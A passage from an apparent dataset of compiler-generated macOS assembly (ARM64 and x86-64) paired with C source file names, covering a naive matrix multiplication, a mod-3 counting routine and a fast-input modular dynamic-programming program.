LBB1_6: ; in Loop: Header=BB1_1 Depth=1
b LBB1_7
LBB1_7: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB1_1
LBB1_8:
ldur x0, [x29, #-16]
ldr x1, [sp, #24]
ldr x2, [sp, #16]
ldur w3, [x29, #-8]
bl _mm
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _mm ## -- Begin function mm
.p2align 4, 0x90
_mm: ## @mm
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movl %ecx, -28(%rbp)
movl $0, -32(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
## Child Loop BB0_5 Depth 3
movl -32(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB0_12
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl $0, -36(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_5 Depth 3
movl -36(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB0_10
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
xorps %xmm0, %xmm0
movsd %xmm0, -48(%rbp)
movl $0, -52(%rbp)
LBB0_5: ## Parent Loop BB0_1 Depth=1
## Parent Loop BB0_3 Depth=2
## => This Inner Loop Header: Depth=3
movl -52(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB0_8
## %bb.6: ## in Loop: Header=BB0_5 Depth=3
movq -8(%rbp), %rax
movl -32(%rbp), %ecx
imull -28(%rbp), %ecx
addl -52(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -64(%rbp)
movq -16(%rbp), %rax
movl -52(%rbp), %ecx
imull -28(%rbp), %ecx
addl -36(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -72(%rbp)
movsd -64(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd -72(%rbp), %xmm2 ## xmm2 = mem[0],zero
movsd -48(%rbp), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, -48(%rbp)
## %bb.7: ## in Loop: Header=BB0_5 Depth=3
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB0_5
LBB0_8: ## in Loop: Header=BB0_3 Depth=2
movsd -48(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
movl -32(%rbp), %ecx
imull -28(%rbp), %ecx
addl -36(%rbp), %ecx
movslq %ecx, %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.9: ## in Loop: Header=BB0_3 Depth=2
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB0_3
LBB0_10: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_11
LBB0_11: ## in Loop: Header=BB0_1 Depth=1
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB0_1
LBB0_12:
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl $0, -4(%rbp)
movl $2000, -8(%rbp) ## imm = 0x7D0
movl -8(%rbp), %eax
imull -8(%rbp), %eax
movslq %eax, %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -16(%rbp)
movl -8(%rbp), %eax
imull -8(%rbp), %eax
movslq %eax, %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -24(%rbp)
movl -8(%rbp), %eax
imull -8(%rbp), %eax
movslq %eax, %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -32(%rbp)
movl $0, -36(%rbp)
LBB1_1: ## =>This Loop Header: Depth=1
## Child Loop BB1_3 Depth 2
movl -36(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB1_8
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movl $0, -40(%rbp)
LBB1_3: ## Parent Loop BB1_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -40(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB1_6
## %bb.4: ## in Loop: Header=BB1_3 Depth=2
cvtsi2sdl -36(%rbp), %xmm0
movq -16(%rbp), %rax
movl -36(%rbp), %ecx
imull -8(%rbp), %ecx
addl -40(%rbp), %ecx
movslq %ecx, %rcx
movsd %xmm0, (%rax,%rcx,8)
cvtsi2sdl -40(%rbp), %xmm0
movq -24(%rbp), %rax
movl -36(%rbp), %ecx
imull -8(%rbp), %ecx
addl -40(%rbp), %ecx
movslq %ecx, %rcx
movsd %xmm0, (%rax,%rcx,8)
movq -32(%rbp), %rax
movl -36(%rbp), %ecx
imull -8(%rbp), %ecx
addl -40(%rbp), %ecx
movslq %ecx, %rcx
xorps %xmm0, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.5: ## in Loop: Header=BB1_3 Depth=2
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
jmp LBB1_3
LBB1_6: ## in Loop: Header=BB1_1 Depth=1
jmp LBB1_7
LBB1_7: ## in Loop: Header=BB1_1 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB1_1
LBB1_8:
movq -16(%rbp), %rdi
movq -24(%rbp), %rsi
movq -32(%rbp), %rdx
movl -8(%rbp), %ecx
callq _mm
movl -4(%rbp), %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/234517012.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-28]
mov x9, sp
add x8, sp, #28
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
ldr w8, [sp, #28]
subs w9, w8, #1
str w9, [sp, #28]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_9
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
str wzr, [sp, #16]
stur xzr, [x29, #-24]
stur wzr, [x29, #-16]
mov x9, sp
add x8, sp, #24
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
str wzr, [sp, #12]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #12]
ldr w9, [sp, #24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
mov x9, sp
add x8, sp, #20
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
ldr w8, [sp, #20]
mov w10, #3
sdiv w9, w8, w10
mul w9, w9, w10
subs w9, w8, w9
sub x8, x29, #24
add x9, x8, w9, sxtw #2
ldr w8, [x9]
add w8, w8, #1
str w8, [x9]
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB0_3
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-16]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-16]
str w8, [sp, #32]
ldur w8, [x29, #-20]
stur w8, [x29, #-16]
ldr w8, [sp, #32]
stur w8, [x29, #-20]
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-24]
ldur w9, [x29, #-20]
add w8, w8, w9
ldur w9, [x29, #-16]
ldur w10, [x29, #-20]
subs w9, w9, w10
mov w10, #3
sdiv w9, w9, w10
add w8, w8, w9
str w8, [sp, #16]
ldr w9, [sp, #16]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_1
LBB0_9:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_11
b LBB0_10
LBB0_10:
bl ___stack_chk_fail
LBB0_11:
mov w0, #0
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "%d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -24(%rbp)
leaq L_.str(%rip), %rdi
leaq -32(%rbp), %rsi
movb $0, %al
callq _scanf
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
movl -32(%rbp), %eax
movl %eax, %ecx
addl $-1, %ecx
movl %ecx, -32(%rbp)
cmpl $0, %eax
je LBB0_9
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl $0, -44(%rbp)
leaq -20(%rbp), %rdi
xorl %esi, %esi
movl $12, %edx
callq _memset
leaq L_.str(%rip), %rdi
leaq -36(%rbp), %rsi
movb $0, %al
callq _scanf
movl $0, -48(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -48(%rbp), %eax
cmpl -36(%rbp), %eax
jge LBB0_6
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
leaq L_.str(%rip), %rdi
leaq -40(%rbp), %rsi
movb $0, %al
callq _scanf
movl -40(%rbp), %eax
movl $3, %ecx
cltd
idivl %ecx
movslq %edx, %rax
movl -20(%rbp,%rax,4), %ecx
addl $1, %ecx
movl %ecx, -20(%rbp,%rax,4)
## %bb.5: ## in Loop: Header=BB0_3 Depth=2
movl -48(%rbp), %eax
addl $1, %eax
movl %eax, -48(%rbp)
jmp LBB0_3
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
jge LBB0_8
## %bb.7: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
movl %eax, -28(%rbp)
movl -16(%rbp), %eax
movl %eax, -12(%rbp)
movl -28(%rbp), %eax
movl %eax, -16(%rbp)
LBB0_8: ## in Loop: Header=BB0_1 Depth=1
movl -20(%rbp), %eax
addl -16(%rbp), %eax
movl %eax, -52(%rbp) ## 4-byte Spill
movl -12(%rbp), %eax
subl -16(%rbp), %eax
movl $3, %ecx
cltd
idivl %ecx
movl %eax, %ecx
movl -52(%rbp), %eax ## 4-byte Reload
addl %ecx, %eax
movl %eax, -44(%rbp)
movl -44(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_1
LBB0_9:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_11
## %bb.10:
xorl %eax, %eax
addq $64, %rsp
popq %rbp
retq
LBB0_11:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "%d\n"
.subsections_via_symbols
| the_stack_data/211080684.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _z_flush ; -- Begin function z_flush
.p2align 2
_z_flush: ; @z_flush
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, _z_ob@GOTPAGE
ldr x0, [x0, _z_ob@GOTPAGEOFF]
mov x9, x0
adrp x8, _z_op@PAGE
ldr x8, [x8, _z_op@PAGEOFF]
subs x1, x8, x9
adrp x8, ___stdoutp@GOTPAGE
ldr x8, [x8, ___stdoutp@GOTPAGEOFF]
ldr x3, [x8]
mov x2, #1
bl _fwrite
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #208
.cfi_def_cfa_offset 208
stp x29, x30, [sp, #192] ; 16-byte Folded Spill
add x29, sp, #192
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
stur x8, [x29, #-64] ; 8-byte Folded Spill
adrp x8, ___stdoutp@GOTPAGE
ldr x8, [x8, ___stdoutp@GOTPAGEOFF]
stur x8, [x29, #-56] ; 8-byte Folded Spill
adrp x8, _z_ib@GOTPAGE
ldr x8, [x8, _z_ib@GOTPAGEOFF]
str x8, [sp, #64] ; 8-byte Folded Spill
add x8, x8, #1024
str x8, [sp, #72] ; 8-byte Folded Spill
adrp x8, _f@GOTPAGE
ldr x8, [x8, _f@GOTPAGEOFF]
str x8, [sp, #80] ; 8-byte Folded Spill
adrp x9, _z_np@GOTPAGE
ldr x9, [x9, _z_np@GOTPAGEOFF]
str x9, [sp, #88] ; 8-byte Folded Spill
adrp x9, _z_ob@GOTPAGE
ldr x9, [x9, _z_ob@GOTPAGEOFF]
str x9, [sp, #96] ; 8-byte Folded Spill
add x9, x9, #1024
stur x9, [x29, #-88] ; 8-byte Folded Spill
mov x9, #51719
movk x9, #15258, lsl #16
stur x9, [x29, #-80] ; 8-byte Folded Spill
add x8, x8, #2472
stur x8, [x29, #-72] ; 8-byte Folded Spill
stur wzr, [x29, #-4]
adrp x0, _z_flush@PAGE
add x0, x0, _z_flush@PAGEOFF
bl _atexit
ldur x8, [x29, #-64] ; 8-byte Folded Reload
ldr x2, [x8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _freopen
ldur x8, [x29, #-56] ; 8-byte Folded Reload
ldr x2, [x8]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _freopen
b LBB1_1
LBB1_1:
mov w8, #1
stur w8, [x29, #-28]
b LBB1_2
LBB1_2: ; =>This Inner Loop Header: Depth=1
ldr x9, [sp, #72] ; 8-byte Folded Reload
adrp x8, _z_ip@PAGE
ldr x8, [x8, _z_ip@PAGEOFF]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB1_4
b LBB1_3
LBB1_3: ; in Loop: Header=BB1_2 Depth=1
ldur x8, [x29, #-64] ; 8-byte Folded Reload
ldr x10, [sp, #64] ; 8-byte Folded Reload
adrp x9, _z_ip@PAGE
str x9, [sp, #48] ; 8-byte Folded Spill
str x10, [x9, _z_ip@PAGEOFF]
ldr x0, [x9, _z_ip@PAGEOFF]
ldr x3, [x8]
mov x1, #1
mov x2, #1024
bl _fread
ldr x10, [sp, #48] ; 8-byte Folded Reload
ldr x8, [x10, _z_ip@PAGEOFF]
add x9, x8, #1
str x9, [x10, _z_ip@PAGEOFF]
ldrsb w8, [x8]
str w8, [sp, #60] ; 4-byte Folded Spill
b LBB1_5
LBB1_4: ; in Loop: Header=BB1_2 Depth=1
adrp x10, _z_ip@PAGE
ldr x8, [x10, _z_ip@PAGEOFF]
add x9, x8, #1
str x9, [x10, _z_ip@PAGEOFF]
ldrsb w8, [x8]
str w8, [sp, #60] ; 4-byte Folded Spill
b LBB1_5
LBB1_5: ; in Loop: Header=BB1_2 Depth=1
ldr w0, [sp, #60] ; 4-byte Folded Reload
stur w0, [x29, #-32]
bl _isdigit
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_9
b LBB1_6
LBB1_6: ; in Loop: Header=BB1_2 Depth=1
ldur w8, [x29, #-32]
subs w8, w8, #45
cset w8, ne
tbnz w8, #0, LBB1_8
b LBB1_7
LBB1_7: ; in Loop: Header=BB1_2 Depth=1
mov w8, #-1
stur w8, [x29, #-28]
b LBB1_8
LBB1_8: ; in Loop: Header=BB1_2 Depth=1
b LBB1_2
LBB1_9:
ldur w8, [x29, #-32]
subs w8, w8, #48
stur w8, [x29, #-20]
b LBB1_10
LBB1_10: ; =>This Inner Loop Header: Depth=1
ldr x9, [sp, #72] ; 8-byte Folded Reload
adrp x8, _z_ip@PAGE
ldr x8, [x8, _z_ip@PAGEOFF]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB1_12
b LBB1_11
LBB1_11: ; in Loop: Header=BB1_10 Depth=1
ldur x8, [x29, #-64] ; 8-byte Folded Reload
ldr x10, [sp, #64] ; 8-byte Folded Reload
adrp x9, _z_ip@PAGE
str x9, [sp, #32] ; 8-byte Folded Spill
str x10, [x9, _z_ip@PAGEOFF]
ldr x0, [x9, _z_ip@PAGEOFF]
ldr x3, [x8]
mov x1, #1
mov x2, #1024
bl _fread
ldr x10, [sp, #32] ; 8-byte Folded Reload
ldr x8, [x10, _z_ip@PAGEOFF]
add x9, x8, #1
str x9, [x10, _z_ip@PAGEOFF]
ldrsb w8, [x8]
str w8, [sp, #44] ; 4-byte Folded Spill
b LBB1_13
LBB1_12: ; in Loop: Header=BB1_10 Depth=1
adrp x10, _z_ip@PAGE
ldr x8, [x10, _z_ip@PAGEOFF]
add x9, x8, #1
str x9, [x10, _z_ip@PAGEOFF]
ldrsb w8, [x8]
str w8, [sp, #44] ; 4-byte Folded Spill
b LBB1_13
LBB1_13: ; in Loop: Header=BB1_10 Depth=1
ldr w0, [sp, #44] ; 4-byte Folded Reload
stur w0, [x29, #-32]
bl _isdigit
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB1_15
b LBB1_14
LBB1_14: ; in Loop: Header=BB1_10 Depth=1
ldur w8, [x29, #-20]
mov w9, #10
mul w8, w8, w9
ldur w9, [x29, #-32]
add w8, w8, w9
subs w8, w8, #48
stur w8, [x29, #-20]
b LBB1_10
LBB1_15:
ldur w9, [x29, #-28]
ldur w8, [x29, #-20]
mul w8, w8, w9
stur w8, [x29, #-20]
b LBB1_16
LBB1_16:
b LBB1_17
LBB1_17:
mov w8, #1
stur w8, [x29, #-36]
b LBB1_18
LBB1_18: ; =>This Inner Loop Header: Depth=1
ldr x9, [sp, #72] ; 8-byte Folded Reload
adrp x8, _z_ip@PAGE
ldr x8, [x8, _z_ip@PAGEOFF]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB1_20
b LBB1_19
LBB1_19: ; in Loop: Header=BB1_18 Depth=1
ldur x8, [x29, #-64] ; 8-byte Folded Reload
ldr x10, [sp, #64] ; 8-byte Folded Reload
adrp x9, _z_ip@PAGE
str x9, [sp, #16] ; 8-byte Folded Spill
str x10, [x9, _z_ip@PAGEOFF]
ldr x0, [x9, _z_ip@PAGEOFF]
ldr x3, [x8]
mov x1, #1
mov x2, #1024
bl _fread
ldr x10, [sp, #16] ; 8-byte Folded Reload
ldr x8, [x10, _z_ip@PAGEOFF]
add x9, x8, #1
str x9, [x10, _z_ip@PAGEOFF]
ldrsb w8, [x8]
str w8, [sp, #28] ; 4-byte Folded Spill
b LBB1_21
LBB1_20: ; in Loop: Header=BB1_18 Depth=1
adrp x10, _z_ip@PAGE
ldr x8, [x10, _z_ip@PAGEOFF]
add x9, x8, #1
str x9, [x10, _z_ip@PAGEOFF]
ldrsb w8, [x8]
str w8, [sp, #28] ; 4-byte Folded Spill
b LBB1_21
LBB1_21: ; in Loop: Header=BB1_18 Depth=1
ldr w0, [sp, #28] ; 4-byte Folded Reload
stur w0, [x29, #-40]
bl _isdigit
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_25
b LBB1_22
LBB1_22: ; in Loop: Header=BB1_18 Depth=1
ldur w8, [x29, #-40]
subs w8, w8, #45
cset w8, ne
tbnz w8, #0, LBB1_24
b LBB1_23
LBB1_23: ; in Loop: Header=BB1_18 Depth=1
mov w8, #-1
stur w8, [x29, #-36]
b LBB1_24
LBB1_24: ; in Loop: Header=BB1_18 Depth=1
b LBB1_18
LBB1_25:
ldur w8, [x29, #-40]
subs w8, w8, #48
stur w8, [x29, #-24]
b LBB1_26
LBB1_26: ; =>This Inner Loop Header: Depth=1
ldr x9, [sp, #72] ; 8-byte Folded Reload
adrp x8, _z_ip@PAGE
ldr x8, [x8, _z_ip@PAGEOFF]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB1_28
b LBB1_27
LBB1_27: ; in Loop: Header=BB1_26 Depth=1
ldur x8, [x29, #-64] ; 8-byte Folded Reload
ldr x10, [sp, #64] ; 8-byte Folded Reload
adrp x9, _z_ip@PAGE
str x9, [sp] ; 8-byte Folded Spill
str x10, [x9, _z_ip@PAGEOFF]
ldr x0, [x9, _z_ip@PAGEOFF]
ldr x3, [x8]
mov x1, #1
mov x2, #1024
bl _fread
ldr x10, [sp] ; 8-byte Folded Reload
ldr x8, [x10, _z_ip@PAGEOFF]
add x9, x8, #1
str x9, [x10, _z_ip@PAGEOFF]
ldrsb w8, [x8]
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB1_29
LBB1_28: ; in Loop: Header=BB1_26 Depth=1
adrp x10, _z_ip@PAGE
ldr x8, [x10, _z_ip@PAGEOFF]
add x9, x8, #1
str x9, [x10, _z_ip@PAGEOFF]
ldrsb w8, [x8]
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB1_29
LBB1_29: ; in Loop: Header=BB1_26 Depth=1
ldr w0, [sp, #12] ; 4-byte Folded Reload
stur w0, [x29, #-40]
bl _isdigit
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB1_31
b LBB1_30
LBB1_30: ; in Loop: Header=BB1_26 Depth=1
ldur w8, [x29, #-24]
mov w9, #10
mul w8, w8, w9
ldur w9, [x29, #-40]
add w8, w8, w9
subs w8, w8, #48
stur w8, [x29, #-24]
b LBB1_26
LBB1_31:
ldur w9, [x29, #-36]
ldur w8, [x29, #-24]
mul w8, w8, w9
stur w8, [x29, #-24]
b LBB1_32
LBB1_32:
ldr x9, [sp, #80] ; 8-byte Folded Reload
mov x8, #1
str x8, [x9, #2480]
mov w8, #2
stur w8, [x29, #-8]
b LBB1_33
LBB1_33: ; =>This Loop Header: Depth=1
; Child Loop BB1_35 Depth 2
ldur w8, [x29, #-8]
ldur w9, [x29, #-24]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_40
b LBB1_34
LBB1_34: ; in Loop: Header=BB1_33 Depth=1
mov w8, #1
stur w8, [x29, #-16]
b LBB1_35
LBB1_35: ; Parent Loop BB1_33 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-16]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_38
b LBB1_36
LBB1_36: ; in Loop: Header=BB1_35 Depth=2
ldur x9, [x29, #-72] ; 8-byte Folded Reload
ldur x11, [x29, #-80] ; 8-byte Folded Reload
ldursw x8, [x29, #-8]
ldr x8, [x9, x8, lsl #3]
ldur w10, [x29, #-8]
ldur w12, [x29, #-16]
subs w10, w10, w12
ldr x10, [x9, w10, sxtw #3]
ldursw x12, [x29, #-16]
ldr x12, [x9, x12, lsl #3]
mul x10, x10, x12
sdiv x12, x10, x11
mul x12, x12, x11
subs x10, x10, x12
add x8, x8, x10
sdiv x10, x8, x11
mul x10, x10, x11
subs x8, x8, x10
ldursw x10, [x29, #-8]
str x8, [x9, x10, lsl #3]
b LBB1_37
LBB1_37: ; in Loop: Header=BB1_35 Depth=2
ldur w8, [x29, #-16]
add w8, w8, #1
stur w8, [x29, #-16]
b LBB1_35
LBB1_38: ; in Loop: Header=BB1_33 Depth=1
b LBB1_39
LBB1_39: ; in Loop: Header=BB1_33 Depth=1
ldur w8, [x29, #-8]
add w8, w8, #1
stur w8, [x29, #-8]
b LBB1_33
LBB1_40:
mov w8, #2
stur w8, [x29, #-8]
b LBB1_41
LBB1_41: ; =>This Loop Header: Depth=1
; Child Loop BB1_43 Depth 2
; Child Loop BB1_45 Depth 3
; Child Loop BB1_49 Depth 3
ldur w8, [x29, #-8]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_56
b LBB1_42
LBB1_42: ; in Loop: Header=BB1_41 Depth=1
mov w8, #1
stur w8, [x29, #-12]
b LBB1_43
LBB1_43: ; Parent Loop BB1_41 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB1_45 Depth 3
; Child Loop BB1_49 Depth 3
ldur w8, [x29, #-12]
ldur w9, [x29, #-24]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_54
b LBB1_44
LBB1_44: ; in Loop: Header=BB1_43 Depth=2
mov w8, #1
stur w8, [x29, #-16]
b LBB1_45
LBB1_45: ; Parent Loop BB1_41 Depth=1
; Parent Loop BB1_43 Depth=2
; => This Inner Loop Header: Depth=3
ldur w8, [x29, #-16]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_48
b LBB1_46
LBB1_46: ; in Loop: Header=BB1_45 Depth=3
ldr x9, [sp, #80] ; 8-byte Folded Reload
ldur x12, [x29, #-80] ; 8-byte Folded Reload
ldursw x8, [x29, #-8]
mov x11, #2472
mul x10, x8, x11
mov x8, x9
add x8, x8, x10
ldursw x10, [x29, #-12]
ldr x8, [x8, x10, lsl #3]
ldur w10, [x29, #-8]
ldur w13, [x29, #-16]
subs w10, w10, w13
mov x14, x9
mov w13, #2472
smaddl x10, w10, w13, x14
ldursw x13, [x29, #-12]
ldr x10, [x10, x13, lsl #3]
ldursw x13, [x29, #-16]
mul x14, x13, x11
mov x13, x9
add x13, x13, x14
ldursw x14, [x29, #-12]
ldr x13, [x13, x14, lsl #3]
mul x10, x10, x13
sdiv x13, x10, x12
mul x13, x13, x12
subs x10, x10, x13
add x8, x8, x10
sdiv x10, x8, x12
mul x10, x10, x12
subs x8, x8, x10
ldursw x10, [x29, #-8]
mul x10, x10, x11
add x9, x9, x10
ldursw x10, [x29, #-12]
str x8, [x9, x10, lsl #3]
b LBB1_47
LBB1_47: ; in Loop: Header=BB1_45 Depth=3
ldur w8, [x29, #-16]
add w8, w8, #1
stur w8, [x29, #-16]
b LBB1_45
LBB1_48: ; in Loop: Header=BB1_43 Depth=2
mov w8, #1
stur w8, [x29, #-16]
b LBB1_49
LBB1_49: ; Parent Loop BB1_41 Depth=1
; Parent Loop BB1_43 Depth=2
; => This Inner Loop Header: Depth=3
ldur w8, [x29, #-16]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_52
b LBB1_50
LBB1_50: ; in Loop: Header=BB1_49 Depth=3
ldr x9, [sp, #80] ; 8-byte Folded Reload
ldur x12, [x29, #-80] ; 8-byte Folded Reload
ldursw x8, [x29, #-8]
mov x11, #2472
mul x10, x8, x11
mov x8, x9
add x8, x8, x10
ldursw x10, [x29, #-12]
ldr x8, [x8, x10, lsl #3]
ldursw x10, [x29, #-8]
mul x13, x10, x11
mov x10, x9
add x10, x10, x13
ldur w13, [x29, #-12]
ldur w14, [x29, #-16]
subs w13, w13, w14
ldr x10, [x10, w13, sxtw #3]
ldursw x13, [x29, #-8]
mul x14, x13, x11
mov x13, x9
add x13, x13, x14
ldursw x14, [x29, #-16]
ldr x13, [x13, x14, lsl #3]
mul x10, x10, x13
sdiv x13, x10, x12
mul x13, x13, x12
subs x10, x10, x13
add x8, x8, x10
sdiv x10, x8, x12
mul x10, x10, x12
subs x8, x8, x10
ldursw x10, [x29, #-8]
mul x10, x10, x11
add x9, x9, x10
ldursw x10, [x29, #-12]
str x8, [x9, x10, lsl #3]
b LBB1_51
LBB1_51: ; in Loop: Header=BB1_49 Depth=3
ldur w8, [x29, #-16]
add w8, w8, #1
stur w8, [x29, #-16]
b LBB1_49
